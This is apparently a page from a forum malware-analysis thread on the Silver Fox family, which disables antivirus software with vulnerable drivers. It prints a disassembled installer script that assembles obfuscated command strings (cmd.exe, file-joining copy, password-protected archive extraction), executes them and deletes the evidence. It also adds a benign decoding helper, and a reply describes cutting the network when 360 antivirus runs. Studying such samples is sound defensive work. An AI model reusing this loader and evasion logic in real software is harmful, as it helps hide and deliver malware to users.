Topic: The continually evolving Silver Fox: adding ever more vulnerable drivers to kill antivirus software via BYOVD
Posted by z3960 on 2026-02-21 07:49
23], S32(108)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var6 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype WideString ; StackCount = 14
assign Var14, Var4
add Var14, Var5
assign Var11, Var14
pop ; StackCount = 13
pushtype WideString ; StackCount = 14
assign Var14, Var4
add Var14, Var6
assign Var12, Var14
pop ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(10)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(104)
assign Var15[1], S32(116)
assign Var15[2], S32(76)
assign Var15[3], S32(99)
assign Var15[4], S32(69)
assign Var15[5], S32(78)
assign Var15[6], S32(121)
assign Var15[7], S32(82)
assign Var15[8], S32(70)
assign Var15[9], S32(89)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var9 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(10)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(119)
assign Var15[1], S32(88)
assign Var15[2], S32(115)
assign Var15[3], S32(72)
assign Var15[4], S32(70)
assign Var15[5], S32(110)
assign Var15[6], S32(85)
assign Var15[7], S32(110)
assign Var15[8], S32(113)
assign Var15[9], S32(75)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var10 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype WideString ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(7)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(120)
assign Var17[1], S32(32)
assign Var17[2], S32(45)
assign Var17[3], S32(121)
assign Var17[4], S32(32)
assign Var17[5], S32(45)
assign Var17[6], S32(112)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
add Var14, Var9
add Var14, Var10
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(4)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(32)
assign Var17[1], S32(45)
assign Var17[2], S32(111)
assign Var17[3], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
add Var14, Var4
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(3)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(34)
assign Var17[1], S32(32)
assign Var17[2], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
add Var14, Var12
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(1)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushtype BOOLEAN ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
assign Var15, Var11
pushvar Var14 ; StackCount = 16
call FILEEXISTS
pop ; StackCount = 15
pop ; StackCount = 14
jz loc_18bc, Var14
pushtype BOOLEAN ; StackCount = 15
pushtype UnicodeString_2 ; StackCount = 16
assign Var16, Var12
pushvar Var15 ; StackCount = 17
call FILEEXISTS
pop ; StackCount = 16
pop ; StackCount = 15
and Var14, Var15
pop ; StackCount = 14
loc_18bc:
sfz Var14
pop ; StackCount = 13
jf loc_196d
pushtype BOOLEAN ; StackCount = 14
pushtype Pointer ; StackCount = 15
setptr Var15, Var1
pushtype U8_4 ; StackCount = 16
assign Var16, U8_4(1)
pushtype S32 ; StackCount = 17
assign Var17, S32(0)
pushtype UnicodeString_2 ; StackCount = 18
assign Var18, String_3("")
pushtype UnicodeString_2 ; StackCount = 19
assign Var19, Var13
pushtype UnicodeString_2 ; StackCount = 20
assign Var20, Var11
pushvar Var14 ; StackCount = 21
call EXEC
pop ; StackCount = 20
pop ; StackCount = 19
pop ; StackCount = 18
pop ; StackCount = 17
pop ; StackCount = 16
pop ; StackCount = 15
pop ; StackCount = 14
pop ; StackCount = 13
pushtype BOOLEAN ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
assign Var15, Var12
pushvar Var14 ; StackCount = 16
call DELETEFILE
pop ; StackCount = 15
pop ; StackCount = 14
pop ; StackCount = 13
loc_196d:
ret
Here we see large numbers of ASCII codes; for example, the [99, 109, 100, 46, 101, 120, 101] at the beginning corresponds to cmd.exe:
assign Var15[0], S32(99)  ; 'c'
assign Var15[1], S32(109) ; 'm'
assign Var15[2], S32(100) ; 'd'
assign Var15[3], S32(46)  ; '.'
assign Var15[4], S32(101) ; 'e'
assign Var15[5], S32(120) ; 'x'
assign Var15[6], S32(101) ; 'e'
This function contains several ASCII-code arrays that are used to build strings and run commands. Each string is encoded as an array of character codes (for instance [67, 58, 92, ...] decodes to C:\...) and only assembled at run time via STRFROMCODE, which makes static analysis harder.
The ASCII codes recovered from every array, together with the resulting strings, are listed below:
First array (7 bytes) ASCII codes: 99, 109, 100, 46, 101, 120, 101. String: "cmd.exe"
Second array (137 bytes) ASCII codes: 47, 99, 32, 99, 111, 112, 121, 32, 47, 98, 32, 47, 121, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 109, 97, 105, 110, 46, 49, 34, 32, 43, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 10
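Recovering the strings by hand from a listing like the one above is tedious, so here is an added helper (not from the original post or the sample's author) that re-splits a disassembly dump that extraction ran onto one line and then decodes every `assign VarN[i], S32(code)` run back into text. The mnemonic set and the `SAMPLE` dump are assumptions: the mnemonics are the ones visible in this page's listing, and `SAMPLE` is a short fragment constructed from it.

```python
import re

# Mnemonics observed in this page's Inno Setup script disassembly (assumed
# to be the complete set for the fragment; extend the tuple for other dumps).
MNEMONICS = ("assign", "pushtype", "pushvar", "pop", "call", "add", "and",
             "jz", "jf", "sfz", "setptr", "ret")

# A flattened dump has each instruction glued to the previous one, e.g.
# "S32(99)assign Var15[1]" or "STRFROMCODEpop ; StackCount = 14".  Split
# wherever a lowercase mnemonic (or a loc_ label) directly follows a
# non-space character; operands are capitalised, so they never match.
_SPLIT_RE = re.compile(r"(?<=\S)(?=(?:%s)\b|loc_)" % "|".join(MNEMONICS))

# One element of an encoded string: assign Var15[3], S32(46)
_ARRAY_RE = re.compile(r"^assign (Var\d+)\[(\d+)\], S32\((\d+)\)$")


def split_flattened(text: str) -> list[str]:
    """Re-insert the line breaks that extraction removed from a dump."""
    return [ln.strip() for ln in _SPLIT_RE.split(text) if ln.strip()]


def recover_strings(lines: list[str]) -> list[str]:
    """Decode each consecutive run of VarN[i] = S32(code) stores into a string."""
    found, cur_var, cur = [], None, []
    for ln in lines:
        m = _ARRAY_RE.match(ln)
        if m and m.group(1) == cur_var and int(m.group(2)) == len(cur):
            cur.append(chr(int(m.group(3))))   # next element of the same array
            continue
        if cur:                                # run ended: emit the string
            found.append("".join(cur))
        cur_var, cur = (m.group(1), [chr(int(m.group(3)))]) if m else (None, [])
    if cur:
        found.append("".join(cur))
    return found


def decode_dump(text: str) -> list[str]:
    return recover_strings(split_flattened(text))


# Constructed sample: the cmd.exe array and the "x -y -p" array from the page,
# glued together the way the extracted listing appears above.
SAMPLE = (
    "assign Var15[0], S32(99)assign Var15[1], S32(109)assign Var15[2], S32(100)"
    "assign Var15[3], S32(46)assign Var15[4], S32(101)assign Var15[5], S32(120)"
    "assign Var15[6], S32(101)assign Var14, Var15pop ; StackCount = 14"
    "pushvar Var9 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14"
    "assign Var17[0], S32(120)assign Var17[1], S32(32)assign Var17[2], S32(45)"
    "assign Var17[3], S32(121)assign Var17[4], S32(32)assign Var17[5], S32(45)"
    "assign Var17[6], S32(112)assign Var16, Var17pop ; StackCount = 16"
    "loc_18bc:sfz Var14pop ; StackCount = 13jf loc_196dpushtype BOOLEAN ; StackCount = 14loc_196d:ret"
)

if __name__ == "__main__":
    print(decode_dump(SAMPLE))  # ['cmd.exe', 'x -y -p']
```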
(page 3/23)
Replies (7):
7 # hanxiao129
02-22 20:31
Looks pretty good
6 # hanxiao129
02-22 20:30
Nice Silver Fox write-up
5 # hanxiao129
02-22 20:30
Thanks to the OP for sharing
4 # huwg
02-21 16:56
Thanks for sharing
3 # huwg
02-21 16:56
Taking a look
2 # huwg
02-21 16:56
Here to take a look
1 # z3960
02-21 07:50
This function checks for the 360 main-defense process; if it is present, it cuts the network connection. Specifically: the function calls the "IS360PROCES .." in the code
